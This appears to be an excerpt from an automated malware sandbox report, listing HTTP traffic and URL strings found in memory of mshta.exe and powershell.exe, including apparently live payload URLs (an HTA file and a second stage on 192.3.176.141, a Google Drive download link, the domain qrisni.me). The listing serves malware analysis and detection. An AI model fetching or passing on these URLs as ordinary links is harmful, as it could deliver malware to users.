                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 17:52:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: mshta.exe, 00000004.00000003.463938971.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/
                Source: mshta.exe, 00000004.00000003.463900149.0000000000500000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463517039.0000000000500000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463626399.0000000000500000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463626399.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463261220.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463517039.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464246158.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463769480.000000000295E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463517039.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464246158.0000000000500000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463261220.0000000000500000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464246158.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463261220.00000000004BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463626399.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463900149.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463900149.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.487696778.000000000357F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta
                Source: mshta.exe, 00000004.00000003.463626399.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463261220.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463517039.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464246158.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463900149.0000000000522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta)-Qo
                Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta...
                Source: mshta.exe, 00000004.00000003.463199089.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463213758.0000000003BD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta...%252525
                Source: mshta.exe, 00000008.00000003.490957335.00000000001FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta/
                Source: mshta.exe, 00000008.00000003.490957335.00000000001FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta1
                Source: mshta.exe, 00000008.00000003.490957335.00000000001FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta:
                Source: mshta.exe, 00000008.00000003.490007380.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.htaC:
                Source: mshta.exe, 00000008.00000003.490007380.0000000003818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.htaG
                Source: mshta.exe, 00000004.00000003.463769480.0000000002955000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.488620769.0000000003575000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489793798.0000000003575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.htahttp://192.3.176.141/41/c
                Source: powershell.exe, 00000005.00000002.511869443.0000000002282000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.498611259.000000000250E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/41/simpleth
                Source: powershell.exe, 0000000C.00000002.498611259.000000000250E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIF
                Source: powershell.exe, 00000005.00000002.519761992.000000001A220000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.499089877.000000001A89E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIF89
                Source: powershell.exe, 00000005.00000002.511869443.0000000002282000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.498611259.000000000250E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/41/simplethingswithgreatthignsgivenmebestthings.tIFp
                Source: mshta.exe, 00000008.00000003.490007380.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003829000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/h
                Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.0000000003818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: powershell.exe, 00000005.00000002.520257981.000000001C14B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
                Source: powershell.exe, 00000005.00000002.511869443.0000000002F7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                Source: powershell.exe, 00000005.00000002.519327515.00000000120B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: powershell.exe, 00000005.00000002.511869443.0000000002081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.498611259.0000000002121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.667153899.000000000230F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.565176374.0000000002391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: aspnet_regbrowsers.exe, aspnet_regbrowsers.exe, 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: powershell.exe, 00000005.00000002.519327515.00000000120B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.519327515.00000000120B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.519327515.00000000120B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000017.00000002.565176374.0000000002592000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
                Source: powershell.exe, 00000017.00000002.565176374.0000000002592000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
                Source: powershell.exe, 00000017.00000002.565176374.0000000002751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
                Source: powershell.exe, 00000017.00000002.565176374.0000000002751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                Source: powershell.exe, 00000005.00000002.519327515.00000000120B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: mshta.exe, 00000004.00000003.463938971.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463626399.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463261220.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463517039.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464246158.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463900149.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.0000000003818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qrisni.me/
                Source: mshta.exe, 00000004.00000003.463626399.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463261220.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463517039.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464246158.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463900149.0000000000522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qrisni.me/1;
                Source: mshta.exe, 00000008.00000003.490957335.00000000001FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qrisni.me/C
                Source: mshta.exe, 00000008.00000003.490957335.00000000001FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qrisni.me/Z
